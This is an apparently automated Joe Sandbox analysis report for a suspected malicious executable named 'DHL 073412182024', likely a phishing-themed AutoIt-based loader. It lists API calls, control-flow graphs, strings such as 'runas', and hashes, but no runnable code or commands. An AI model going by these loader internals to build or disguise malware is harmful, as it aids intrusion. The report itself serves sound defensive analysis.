                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,00E62224), ref: 00DE2C17
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                      • String ID: runas
                                                                                      • API String ID: 448630720-4000483414
                                                                                      • Opcode ID: a6867e44d65551aa5124753da507918ecba5b44c299afa533e8d4385c0d60364
                                                                                      • Instruction ID: 074283ca5f5b49e615399981bb8b0e1842264517bba300b1219876c3008c3d00
                                                                                      • Opcode Fuzzy Hash: a6867e44d65551aa5124753da507918ecba5b44c299afa533e8d4385c0d60364
                                                                                      • Instruction Fuzzy Hash: DA11B4312083455FCB04FF69E8569BEBBA5DBD7350F08546DF196620A2DF20894D8732
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,00DE5222), ref: 00E0DBCE
                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00E0DBDD
                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00E0DBEE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E0DBFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2695905019-0
                                                                                      • Opcode ID: 76a20bc4caaa99629da97ae4dc3ce7c2292d9b80d7568075d82aa5859a08190a
                                                                                      • Instruction ID: 24f05b5d69242076aaca27bffb1dd04d4964a41f2891dea2a7b85dc4201e81dc
                                                                                      • Opcode Fuzzy Hash: 76a20bc4caaa99629da97ae4dc3ce7c2292d9b80d7568075d82aa5859a08190a
                                                                                      • Instruction Fuzzy Hash: 37F0A7314149285BD2206BF89C4D4AB7F6C9F01334B204742F835F20F0EBB099988795
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper
                                                                                      • String ID: p#
                                                                                      • API String ID: 3964851224-4182048217
                                                                                      • Opcode ID: c1dffcea1b7526b61eae3b5b516789b635b772c1b78a8cf1b4d599b0bd2cd94f
                                                                                      • Instruction ID: 73a26ecfcb72c8633178d6e11ee7dd096905af367a1dfe91ab307a5f4052a537
                                                                                      • Opcode Fuzzy Hash: c1dffcea1b7526b61eae3b5b516789b635b772c1b78a8cf1b4d599b0bd2cd94f
                                                                                      • Instruction Fuzzy Hash: 00A24A706083019FD710DF28C480B6ABBE1FF89314F19996DE99A9B352D771EC45CBA2
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 00DAD807
                                                                                      • timeGetTime.WINMM ref: 00DADA07
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DADB28
                                                                                      • TranslateMessage.USER32(?), ref: 00DADB7B
                                                                                      • DispatchMessageW.USER32(?), ref: 00DADB89
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DADB9F
                                                                                      • Sleep.KERNEL32(0000000A), ref: 00DADBB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                      • String ID:
                                                                                      • API String ID: 2189390790-0
                                                                                      • Opcode ID: 43fb0239f8d0a0e76f545b7016e6b20937e39fb8429cf8d5e7802d1783a424bf
                                                                                      • Instruction ID: 04e3b29bb7150543f866aef62541bef43262d2145b960648e9cee9a04e5e78ec
                                                                                      • Opcode Fuzzy Hash: 43fb0239f8d0a0e76f545b7016e6b20937e39fb8429cf8d5e7802d1783a424bf
                                                                                      • Instruction Fuzzy Hash: DC42DE30604345EFD728CF24C884BBAB7E2FF46314F198559E59A976A1D770E884CBB2

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00DA2D07
                                                                                      • RegisterClassExW.USER32(00000030), ref: 00DA2D31
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DA2D42
                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00DA2D5F
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DA2D6F
                                                                                      • LoadIconW.USER32(000000A9), ref: 00DA2D85
                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DA2D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                      • API String ID: 2914291525-1005189915
                                                                                      • Opcode ID: bfb206f5fa2bc980844ac9bfc3f796671ba298ec289daf7c9af3e6b8caa22bec
                                                                                      • Instruction ID: 19363b5fd80c69d4fb51011cb1170fdc676cd3d63d5b7e9f1e68ace783f1d8f5
                                                                                      • Opcode Fuzzy Hash: bfb206f5fa2bc980844ac9bfc3f796671ba298ec289daf7c9af3e6b8caa22bec
                                                                                      • Instruction Fuzzy Hash: 2C21E7B5911308AFDB00DFA9E849BDDBFB4FB48700F10415AFA15B6290D7B18549CF90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 302 de065b-de068b call de042f 305 de068d-de0698 call dcf2c6 302->305 306 de06a6-de06b2 call dd5221 302->306 311 de069a-de06a1 call dcf2d9 305->311 312 de06cb-de0714 call de039a 306->312 313 de06b4-de06c9 call dcf2c6 call dcf2d9 306->313 322 de097d-de0983 311->322 320 de0716-de071f 312->320 321 de0781-de078a GetFileType 312->321 313->311 324 de0756-de077c GetLastError call dcf2a3 320->324 325 de0721-de0725 320->325 326 de078c-de07bd GetLastError call dcf2a3 CloseHandle 321->326 327 de07d3-de07d6 321->327 324->311 325->324 331 de0727-de0754 call de039a 325->331 326->311 341 de07c3-de07ce call dcf2d9 326->341 329 de07df-de07e5 327->329 330 de07d8-de07dd 327->330 334 de07e9-de0837 call dd516a 329->334 335 de07e7 329->335 330->334 331->321 331->324 344 de0839-de0845 call de05ab 334->344 345 de0847-de086b call de014d 334->345 335->334 341->311 344->345 351 de086f-de0879 call dd86ae 344->351 352 de087e-de08c1 345->352 353 de086d 345->353 351->322 354 de08e2-de08f0 352->354 355 de08c3-de08c7 352->355 353->351 359 de097b 354->359 360 de08f6-de08fa 354->360 355->354 358 de08c9-de08dd 355->358 358->354 359->322 360->359 361 de08fc-de092f CloseHandle call de039a 360->361 364 de0963-de0977 361->364 365 de0931-de095d GetLastError call dcf2a3 call dd5333 361->365 364->359 365->364
                                                                                      APIs
                                                                                        • Part of subcall function 00DE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00DE0704,?,?,00000000,?,00DE0704,00000000,0000000C), ref: 00DE03B7
                                                                                      • GetLastError.KERNEL32 ref: 00DE076F
                                                                                      • __dosmaperr.LIBCMT ref: 00DE0776
                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00DE0782
                                                                                      • GetLastError.KERNEL32 ref: 00DE078C
                                                                                      • __dosmaperr.LIBCMT ref: 00DE0795
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DE07B5
                                                                                      • CloseHandle.KERNEL32(?), ref: 00DE08FF
                                                                                      • GetLastError.KERNEL32 ref: 00DE0931
                                                                                      • __dosmaperr.LIBCMT ref: 00DE0938
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                      • String ID: H
                                                                                      • API String ID: 4237864984-2852464175
                                                                                      • Opcode ID: 42785f2fb8c79f590c15fee263efa6fabfcc7294caeada25b4e87db0f0eb3f81
                                                                                      • Instruction ID: c72c37cffd17dd6de633342318bdcf442364b32e4b0e9d704d04944281762345
                                                                                      • Opcode Fuzzy Hash: 42785f2fb8c79f590c15fee263efa6fabfcc7294caeada25b4e87db0f0eb3f81
                                                                                      • Instruction Fuzzy Hash: 39A10432A001898FDF19FF69D891BAD7FA1EB06320F28015DF815EB391C6719856CBB1

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00DA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E71418,?,00DA2E7F,?,?,?,00000000), ref: 00DA3A78
                                                                                        • Part of subcall function 00DA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DA3379
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DA356A
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DE318D
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DE31CE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00DE3210
                                                                                      • _wcslen.LIBCMT ref: 00DE3277
                                                                                      • _wcslen.LIBCMT ref: 00DE3286
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                      • API String ID: 98802146-2727554177
                                                                                      • Opcode ID: 6ad6a7513a957af3ce5ee4f3ece376dcf0ba9dad86115f77060a246d28636781
                                                                                      • Instruction ID: a229cff382ddeda230d0c818ff88c79b5d41f44c0977636d5e6a6a11d62d9d15
                                                                                      • Opcode Fuzzy Hash: 6ad6a7513a957af3ce5ee4f3ece376dcf0ba9dad86115f77060a246d28636781
                                                                                      • Instruction Fuzzy Hash: 6271A471404302AEC314EF66DC8696BBBE8FF95350F50482DF689A71A0DB74DA88CB71

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00DA2B8E
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00DA2B9D
                                                                                      • LoadIconW.USER32(00000063), ref: 00DA2BB3
                                                                                      • LoadIconW.USER32(000000A4), ref: 00DA2BC5
                                                                                      • LoadIconW.USER32(000000A2), ref: 00DA2BD7
                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DA2BEF
                                                                                      • RegisterClassExW.USER32(?), ref: 00DA2C40
                                                                                        • Part of subcall function 00DA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00DA2D07
                                                                                        • Part of subcall function 00DA2CD4: RegisterClassExW.USER32(00000030), ref: 00DA2D31
                                                                                        • Part of subcall function 00DA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DA2D42
                                                                                        • Part of subcall function 00DA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00DA2D5F
                                                                                        • Part of subcall function 00DA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DA2D6F
                                                                                        • Part of subcall function 00DA2CD4: LoadIconW.USER32(000000A9), ref: 00DA2D85
                                                                                        • Part of subcall function 00DA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DA2D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                      • String ID: #$0$AutoIt v3
                                                                                      • API String ID: 423443420-4155596026
                                                                                      • Opcode ID: 535b021366120502d54a551ec127da39928c985cf8a561056f32deaab6374896
                                                                                      • Instruction ID: c1477a101ab82dab99161d8009a1d19bdedd702b6da57ed6c1a29b99d5ad11b9
                                                                                      • Opcode Fuzzy Hash: 535b021366120502d54a551ec127da39928c985cf8a561056f32deaab6374896
                                                                                      • Instruction Fuzzy Hash: 03212571A00318BFDB10DFABEC49BA97FB4FB48B50F11009AE508B66A0D3B14598DF90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 443 da3170-da3185 444 da3187-da318a 443->444 445 da31e5-da31e7 443->445 446 da31eb 444->446 447 da318c-da3193 444->447 445->444 448 da31e9 445->448 452 de2dfb-de2e23 call da18e2 call dbe499 446->452 453 da31f1-da31f6 446->453 449 da3199-da319e 447->449 450 da3265-da326d PostQuitMessage 447->450 451 da31d0-da31d8 DefWindowProcW 448->451 455 de2e7c-de2e90 call e0bf30 449->455 456 da31a4-da31a8 449->456 458 da3219-da321b 450->458 457 da31de-da31e4 451->457 488 de2e28-de2e2f 452->488 459 da31f8-da31fb 453->459 460 da321d-da3244 SetTimer RegisterWindowMessageW 453->460 455->458 482 de2e96 455->482 464 da31ae-da31b3 456->464 465 de2e68-de2e72 call e0c161 456->465 458->457 461 de2d9c-de2d9f 459->461 462 da3201-da3214 KillTimer call da30f2 call da3c50 459->462 460->458 466 da3246-da3251 CreatePopupMenu 460->466 474 de2dd7-de2df6 MoveWindow 461->474 475 de2da1-de2da5 461->475 462->458 471 de2e4d-de2e54 464->471 472 da31b9-da31be 464->472 478 de2e77 465->478 466->458 471->451 476 de2e5a-de2e63 call e00ad7 471->476 480 da3253-da3263 call da326f 472->480 481 da31c4-da31ca 472->481 474->458 483 de2dc6-de2dd2 SetFocus 475->483 484 de2da7-de2daa 475->484 476->451 478->458 480->458 481->451 481->488 482->451 483->458 484->481 489 de2db0-de2dc1 call da18e2 484->489 488->451 492 de2e35-de2e48 call da30f2 call da3837 488->492 489->458 492->451
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00DA316A,?,?), ref: 00DA31D8
                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00DA316A,?,?), ref: 00DA3204
                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DA3227
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00DA316A,?,?), ref: 00DA3232
                                                                                      • CreatePopupMenu.USER32 ref: 00DA3246
                                                                                      • PostQuitMessage.USER32(00000000), ref: 00DA3267
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                      • String ID: TaskbarCreated
                                                                                      • API String ID: 129472671-2362178303
                                                                                      • Opcode ID: 7657b82c95dff8fadfd592759813ef54a00402125155aa748c7ff3f8ed343cf5
                                                                                      • Instruction ID: 2e19093e80e9a4e3ad11e585e80ebd7c754671998de368034cc96482d1ea87ea
                                                                                      • Opcode Fuzzy Hash: 7657b82c95dff8fadfd592759813ef54a00402125155aa748c7ff3f8ed343cf5
                                                                                      • Instruction Fuzzy Hash: 7C413732240304BFDB146B7D9C0EB793A5BEB87340F184166FA4AB61E1DB71CA8497B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                                                                                      • API String ID: 0-2799515523
                                                                                      • Opcode ID: 9bc02b66f21fad88a947d2c11fdc90100cbc5e202e10b428f814e6f5d947c3b9
                                                                                      • Instruction ID: 879432968f30a7dd0a7961d92ed066cb531b3af57e916eaf303678fe80569403
                                                                                      • Opcode Fuzzy Hash: 9bc02b66f21fad88a947d2c11fdc90100cbc5e202e10b428f814e6f5d947c3b9
                                                                                      • Instruction Fuzzy Hash: B3C28A71A00215CFCB24CF68C880AADB7B1FF4A310F298569E956AB391D775ED41CBB1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1009 fef228-fef2d6 call fecbf8 1012 fef2dd-fef303 call ff0138 CreateFileW 1009->1012 1015 fef30a-fef31a 1012->1015 1016 fef305 1012->1016 1024 fef31c 1015->1024 1025 fef321-fef33b VirtualAlloc 1015->1025 1017 fef455-fef459 1016->1017 1018 fef49b-fef49e 1017->1018 1019 fef45b-fef45f 1017->1019 1021 fef4a1-fef4a8 1018->1021 1022 fef46b-fef46f 1019->1022 1023 fef461-fef464 1019->1023 1026 fef4fd-fef512 1021->1026 1027 fef4aa-fef4b5 1021->1027 1028 fef47f-fef483 1022->1028 1029 fef471-fef47b 1022->1029 1023->1022 1024->1017 1030 fef33d 1025->1030 1031 fef342-fef359 ReadFile 1025->1031 1036 fef514-fef51f VirtualFree 1026->1036 1037 fef522-fef52a 1026->1037 1034 fef4b9-fef4c5 1027->1034 1035 fef4b7 1027->1035 1038 fef485-fef48f 1028->1038 1039 fef493 1028->1039 1029->1028 1030->1017 1032 fef35b 1031->1032 1033 fef360-fef3a0 VirtualAlloc 1031->1033 1032->1017 1040 fef3a7-fef3c2 call ff0388 1033->1040 1041 fef3a2 1033->1041 1042 fef4d9-fef4e5 1034->1042 1043 fef4c7-fef4d7 1034->1043 1035->1026 1036->1037 1038->1039 1039->1018 1049 fef3cd-fef3d7 1040->1049 1041->1017 1046 fef4e7-fef4f0 1042->1046 1047 fef4f2-fef4f8 1042->1047 1045 fef4fb 1043->1045 1045->1021 1046->1045 1047->1045 1050 fef40a-fef41e call ff0198 1049->1050 1051 fef3d9-fef408 call ff0388 1049->1051 1057 fef422-fef426 1050->1057 1058 fef420 1050->1058 1051->1049 1059 fef428-fef42c CloseHandle 1057->1059 1060 fef432-fef436 1057->1060 1058->1017 1059->1060 1061 fef438-fef443 VirtualFree 1060->1061 1062 fef446-fef44f 1060->1062 1061->1062 1062->1012 1062->1017
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00FEF2F9
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FEF51F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileFreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 204039940-0
                                                                                      • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                      • Instruction ID: 6b2835677896272bb871c48a0a205b244ce25caf329c069312e175f6d76bb189
                                                                                      • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                      • Instruction Fuzzy Hash: FAA11671E00249EBDB14CFA5C888BEEBBB5FF48314F208169E215BB280D7759A45EF51

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1073 da2c63-da2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DA2C91
                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DA2CB2
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA1CAD,?), ref: 00DA2CC6
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA1CAD,?), ref: 00DA2CCF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShow
                                                                                      • String ID: AutoIt v3$edit
                                                                                      • API String ID: 1584632944-3779509399
                                                                                      • Opcode ID: edeccc5676e5e0c21cd081f5f510718418c4e294f2ec520e7eb2020db7996e29
                                                                                      • Instruction ID: f1bfe3012f00c07a5ca83f00140b65da68ae0c1505155d2505a8fb8992eae281
                                                                                      • Opcode Fuzzy Hash: edeccc5676e5e0c21cd081f5f510718418c4e294f2ec520e7eb2020db7996e29
                                                                                      • Instruction Fuzzy Hash: CFF03A755403947EEB30472BAC0DF7B3EBDD7C6F50F12009AF908B21A0C2614888DAB0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
